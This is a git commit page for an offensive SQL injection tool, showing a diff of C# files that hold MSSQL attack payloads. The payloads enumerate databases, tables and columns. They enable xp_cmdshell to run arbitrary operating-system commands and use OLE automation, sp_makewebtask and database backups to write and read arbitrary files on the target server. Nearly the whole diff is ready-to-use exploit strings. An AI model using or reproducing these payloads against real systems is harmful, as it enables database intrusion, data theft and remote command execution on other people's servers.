shack2/SuperSQLInjectionV1
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

update20181204

Browse Source 
20181204 V1.0 正式版---
优化注入配置文件,降低误报和漏报。
优化执行命令,文件读取模块解决部分情况无法执行命令或无法读取文件的情况。
修复SQLServer通过错误显示方式无法获取数据的情况。
优化部分代码。
增加自动识别注入记录,可将一个URL每一个参数存在的盲注、报错注入、Union注入都记录下来,可灵活选择对应的注入类型。
This commit is contained in:
shack2
2018-12-04 23:30:51 +08:00
parent 48f27f1726
commit cf2c3990f2
15 changed files with 974 additions and 631 deletions
Download Patch File Download Diff File Expand all files Collapse all files

20
SuperSQLInjection/payload/MSSQL.cs
View File

@@ -23,11 +23,11 @@ namespace SuperSQLInjection.payload
//获取数据库名
public static String db_value = "(select top 1 name from (select top {index} name from [master]..[sysdatabases] order by name) t order by t.name desc)";
public static String db_value = "(select (select top 1 name from (select top {index} name from [master]..[sysdatabases] order by name) t order by t.name desc))";
//获取表名称
public static String table_value = "(select top 1 name from [{dbname}]..[sysobjects] where xtype=0x55 and id not in (select top {index} id from [{dbname}]..[sysobjects] where xtype=0x55))";
public static String table_value = "(select (select top 1 name from [{dbname}]..[sysobjects] where xtype=0x55 and id not in (select top {index} id from [{dbname}]..[sysobjects] where xtype=0x55)))";
//获取列名称
public static String column_value = "(select top 1 name from [{dbname}]..[syscolumns] where id=object_id('{dbname}..{table}') and colid not in (select top {index} colid from [{dbname}]..[syscolumns] where id=object_id('{dbname}..{table}')))";
public static String column_value = "(select (select top 1 name from [{dbname}]..[syscolumns] where id=object_id('{dbname}..{table}') and colid not in (select top {index} colid from [{dbname}]..[syscolumns] where id=object_id('{dbname}..{table}'))))";
//获取数据库数量bool方式
@@ -69,17 +69,17 @@ namespace SuperSQLInjection.payload
//cmd
public static String createTable = " 1=1;drop table ssqlinjection;create table ssqlinjection(id int primary key identity,data varchar(8000));exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'xp_cmdshell',1;reconfigure;declare @cmd varchar(8000);set @cmd={cmd};insert into ssqlinjection(data) exec [master]..[xp_cmdshell] @cmd--";
public static String createTable = " 1=1;drop table ssqlinjection;create table ssqlinjection(id int primary key identity,data varchar(8000));exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'xp_cmdshell',1;reconfigure;declare @cmd varchar(8000);set @cmd={cmd};insert into ssqlinjection(data) exec [master]..[xp_cmdshell] @cmd;select 1 where 1=1 ";
public static String cmdData = "cast((select top 1 data from ssqlinjection where id={index}) as varchar(8000))";
public static String cmdDataCount = "(select count(*) from ssqlinjection)";
public static String dropTable = " 1=1;drop table ssqlinjection;--";
public static String cmdDataCount = "(select (select count(*) from ssqlinjection))";
public static String dropTable = " 1=1;drop table ssqlinjection;select 1 where 1=1 ";
//文件读写
public static String witeFileByFileSystemObject = " 1=1;exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'ole automation procedures',1;reconfigure;declare @object int;declare @file int;declare @data varchar(8000);set @data={data};declare @path varchar(4000);set @path={path};exec [master]..[sp_oacreate] 'scripting.fileSystemObject',@object out;exec [master]..[sp_oamethod] @object,'createtextfile',@file output,@path;exec [master]..[sp_oamethod] @file,'write',null,@data;exec [master]..[sp_oamethod] @file,'close',null;--";
public static String witeFileBySP_MakeWebTask = " 1=1;exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'web assistant procedures',1;reconfigure;declare @d varchar(8000);set @d={data};declare @p varchar(4000);set @p={path};exec sp_makewebtask @p, @d;--";
public static String witeFileByBackDataBase = " 1=1;drop database ssqlinjection;create database ssqlinjection;drop table [ssqlinjection]..[data];create table [ssqlinjection]..[data] (content image);insert into [ssqlinjection]..[data](content) values({data});declare @s varchar(8000);set @s={path} backup database ssqlinjection to disk=@s;--";
public static String readFileByFileSystemobject = " 1=1;exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'ole automation procedures',1;reconfigure;declare @object int;declare @file int;declare @data varchar(8000);exec [master]..[sp_oacreate] 'scripting.filesystemobject',@object out;exec [master]..[sp_oamethod] @object,'OpenTextFile',@file output,'{path}';drop table ssqlinjection;create table ssqlinjection (data varchar(8000));exec [master]..[sp_oamethod] @file,'read',@data out,8000;insert into ssqlinjection(data) values(@data);--";
public static String witeFileByFileSystemObject = " 1=1;exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'ole automation procedures',1;reconfigure;declare @object int;declare @file int;declare @data varchar(8000);set @data={data};declare @path varchar(4000);set @path={path};exec [master]..[sp_oacreate] 'scripting.fileSystemObject',@object out;exec [master]..[sp_oamethod] @object,'createtextfile',@file output,@path;exec [master]..[sp_oamethod] @file,'write',null,@data;exec [master]..[sp_oamethod] @file,'close',null;select 1 where 1=1 ";
public static String witeFileBySP_MakeWebTask = " 1=1;exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'web assistant procedures',1;reconfigure;declare @d varchar(8000);set @d={data};declare @p varchar(4000);set @p={path};exec sp_makewebtask @p, @d;select 1 where 1=1 ";
public static String witeFileByBackDataBase = " 1=1;drop database ssqlinjection;create database ssqlinjection;drop table [ssqlinjection]..[data];create table [ssqlinjection]..[data] (content image);insert into [ssqlinjection]..[data](content) values({data});declare @s varchar(8000);set @s={path} backup database ssqlinjection to disk=@s;select 1 where 1=1 ";
public static String readFileByFileSystemobject = " 1=1;exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'ole automation procedures',1;reconfigure;declare @object int;declare @file int;declare @data varchar(8000);exec [master]..[sp_oacreate] 'scripting.filesystemobject',@object out;exec [master]..[sp_oamethod] @object,'OpenTextFile',@file output,'{path}';drop table ssqlinjection;create table ssqlinjection (data varchar(8000));exec [master]..[sp_oamethod] @file,'read',@data out,8000;insert into ssqlinjection(data) values(@data);select 1 where 1=1 ";
//读文件的的payload
public static String file_content = "(select data from ssqlinjection)";

2
SuperSQLInjection/payload/MySQL5.cs → SuperSQLInjection/payload/MySQL.cs
View File

@@ -5,7 +5,7 @@ using tools;
namespace SuperSQLInjection.payload
{
class MySQL5
class MySQL
{
//加载对应配置(需要读取的环境变量)
public static String path = "config/mysql5/ver.txt";